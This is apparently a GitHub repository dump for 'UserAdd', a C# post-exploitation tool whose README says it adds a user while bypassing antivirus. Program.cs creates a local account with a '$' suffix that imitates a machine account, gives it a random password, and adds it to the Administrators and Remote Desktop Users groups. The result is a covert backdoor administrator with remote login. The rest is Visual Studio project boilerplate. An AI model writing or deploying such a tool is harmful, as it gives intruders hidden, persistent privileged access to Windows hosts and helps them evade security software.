├── UserAdd ├── obj │ ├── Release │ │ ├── UserAdd.csproj.FileListAbsolute.txt │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ └── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ └── Debug │ │ ├── UserAdd.csproj.AssemblyReference.cache │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ └── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs ├── App.config ├── Properties │ └── AssemblyInfo.cs ├── Program.cs └── UserAdd.csproj ├── imgs └── image-20211230125147015.png ├── README.md └── UserAdd.sln /UserAdd/obj/Release/UserAdd.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /UserAdd/obj/Debug/UserAdd.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /imgs/image-20211230125147015.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/UserAdd/HEAD/imgs/image-20211230125147015.png -------------------------------------------------------------------------------- /UserAdd/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/UserAdd/HEAD/UserAdd/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /UserAdd/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/UserAdd/HEAD/UserAdd/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /UserAdd/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /UserAdd/obj/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /UserAdd/obj/Release/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Introduce 2 | 3 | [Bypass AV 添加用户](https://payloads.cn/2021/1230/bypass-av-add-user.html) 4 | 5 | **UserAdd.exe** 6 | 7 | ```tex 8 | [!] The default is 10 bits random password 9 | Usage: UserAdd.exe 10 | ``` 11 | 12 | ![image-20211230125147015](imgs/image-20211230125147015.png) 13 | 14 | 1. 利用`DirectoryService` 命名空间添加用户 15 | 2. 将用户添加到管理员与远程桌面组 16 | 3. Bypass AV 17 | 18 | ------ 19 | 20 | ### Reference 21 | 22 | - [使用目录服务和 Visual C 升在本地系统中添加用户](https://docs.microsoft.com/zh-cn/troubleshoot/dotnet/csharp/add-user-local-system) -------------------------------------------------------------------------------- /UserAdd/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // 有关程序集的一般信息由以下 6 | // 控制。更改这些特性值可修改 7 | // 与程序集关联的信息。 8 | [assembly: AssemblyTitle("UserAdd")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("UserAdd")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // 将 ComVisible 设置为 false 会使此程序集中的类型 18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型 19 | //请将此类型的 ComVisible 特性设置为 true。 20 | [assembly: ComVisible(false)] 21 | 22 | // 如果此项目向 COM 公开，则下列 GUID 用于类型库的 ID 23 | [assembly: Guid("4434b59c-9d21-4847-b95c-fd8cfaeea739")] 24 | 25 | // 程序集的版本信息由下列四个值组成: 26 | // 27 | // 主版本 28 | // 次版本 29 | // 生成号 30 | // 修订号 31 | // 32 | //可以指定所有这些值，也可以使用“生成号”和“修订号”的默认值 33 | //通过使用 "*"，如下所示: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /UserAdd.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.0.32014.148 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "UserAdd", "UserAdd\UserAdd.csproj", "{4434B59C-9D21-4847-B95C-FD8CFAEEA739}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {4434B59C-9D21-4847-B95C-FD8CFAEEA739}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {4434B59C-9D21-4847-B95C-FD8CFAEEA739}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {4434B59C-9D21-4847-B95C-FD8CFAEEA739}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {4434B59C-9D21-4847-B95C-FD8CFAEEA739}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {6ADE94B2-BB43-45D9-AAB5-8132BE6A8489} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /UserAdd/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.DirectoryServices; 3 | 4 | // Reference:https://docs.microsoft.com/zh-cn/troubleshoot/dotnet/csharp/add-user-local-system 5 | 6 | namespace UserAdd 7 | { 8 | class Class1 9 | { 10 | static void Main(string[] args) 11 | { 12 | if (args.Length != 1) 13 | { 14 | Console.WriteLine("[!] The default is 10 bits random password"); 15 | Console.WriteLine("Usage: UserAdd.exe "); 16 | } 17 | else 18 | { 19 | string user = args[0]; 20 | string username = user + "$"; 21 | //10位随机密码 22 | string chars = "!@#$%0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; 23 | Random randrom = new Random((int)DateTime.Now.Ticks); 24 | string password = ""; 25 | for (int i = 0; i < 10; i++) 26 | { 27 | password += chars[randrom.Next(chars.Length)]; 28 | } 29 | try 30 | { 31 | DirectoryEntry AD = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer"); 32 | DirectoryEntry NewUser = AD.Children.Add(username, "user"); 33 | NewUser.Invoke("SetPassword", new object[] { password }); 34 | //NewUser.Invoke("Put", new object[] { "Description", "Test User from .NET" }); 35 | NewUser.CommitChanges(); 36 | DirectoryEntry grp; 37 | 38 | grp = AD.Children.Find("Administrators", "group"); 39 | if (grp != null) { grp.Invoke("Add", new object[] { NewUser.Path.ToString() }); } 40 | grp = AD.Children.Find("Remote Desktop Users", "group"); 41 | if (grp != null) { grp.Invoke("Add", new object[] { NewUser.Path.ToString() }); } 42 | Console.WriteLine("[*] Account Created Successfully"); 43 | Console.WriteLine($"[+] Username: {username}\n[+] Password: {password}"); 44 | } 45 | catch (Exception ex) 46 | { 47 | Console.WriteLine(ex.Message); 48 | } 49 | 50 | } 51 | } 52 | } 53 | } -------------------------------------------------------------------------------- /UserAdd/UserAdd.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {4434B59C-9D21-4847-B95C-FD8CFAEEA739} 8 | Exe 9 | UserAdd 10 | UserAdd 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | --------------------------------------------------------------------------------